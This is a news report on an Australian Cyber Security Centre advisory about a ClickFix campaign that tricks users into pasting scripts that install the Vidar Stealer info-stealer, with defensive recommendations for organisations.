Australia’s ACSC Sounds Alarm: ClickFix Campaign Unleashes Vidar Stealer on Organizations

Breaking: ACSC Warns of Active ClickFix Attacks Spreading Vidar Stealer

The Australian Cyber Security Centre (ACSC) has issued an urgent advisory about a sustained malware campaign that exploits the ClickFix social engineering technique to deliver the Vidar Stealer info-stealer. Organizations across Australia are urged to bolster defenses immediately.

Australia’s ACSC Sounds Alarm: ClickFix Campaign Unleashes Vidar Stealer on Organizations — Source: www.bleepingcomputer.com

“This is an active and evolving threat,” said an ACSC spokesperson. “We have observed multiple incidents where victims are tricked into executing malicious code disguised as routine troubleshooting steps.”

The campaign uses fake error messages or CAPTCHA prompts that instruct users to copy-paste commands, leading to installation of Vidar Stealer.

How ClickFix Works

Attackers display realistic pop-ups claiming the user must verify their identity. These pop-ups often mimic browser or security software alerts.

Victims are told to press a key combination – typically Windows Key + R or open a Run dialog – then paste a script. Once executed, the script downloads and runs the Vidar Stealer malware.

Vidar Stealer Capabilities

Vidar Stealer specializes in harvesting credentials, browser cookies, cryptocurrency wallets, and sensitive files. It exfiltrates data silently and can disable security tools.

“It’s a versatile weapon in the hands of cybercriminals,” explained Emma Tran, a cybersecurity analyst at CyberSafe Australia. “Once Vidar gains a foothold, it can rapidly steal information used for financial fraud and identity theft.”

The malware is often distributed through compromised websites, phishing emails, and malvertising.

Background

The ClickFix technique – also known as “fake error social engineering” – has been used by multiple threat actors since mid-2023. It preys on users’ willingness to follow instructions to resolve what appears to be a simple browser issue.

Vidar Stealer emerged around 2018 as an affordable Malware-as-a-Service (MaaS) on underground forums. It has been linked to several high-profile data breaches globally.

Australia has seen a surge in info-stealer attacks, prompting the ACSC to raise its threat level for critical infrastructure sectors.

What This Means

Organizations must treat any unsolicited browser alerts that request copy-paste actions as highly suspicious. End-user training is critical to recognize and resist these tactics.

“The best defense is user awareness,” said Tran. “If an alert asks you to run a script, it’s almost certainly malicious.”

IT security teams should enforce restrictions on script execution, block PowerShell and cmd from running non-signed scripts, and implement application allowlisting. Immediate steps include:

Disable Windows Script Host and Office macros unless absolutely needed.
Use endpoint detection solutions with behavior analysis to catch Vidar Stealer.
Audit remote access tools and restrict their use.

“Any organization that hasn’t updated its security awareness program should do so today,” the ACSC advised in the advisory.

Recommendations for Organizations

Employ multi-factor authentication on all critical accounts.
Regularly backup data to offline or segregated storage.
Monitor for suspicious Run dialog usage or command-line activity.

The ACSC encourages reporting any incidents via its online portal or by calling the 24/7 cyber hotline.

Reporting Channels

Organizations should submit indicators of compromise (IOCs) and any suspected intrusion to the ACSC. Timely reporting helps disrupt campaigns and protect others.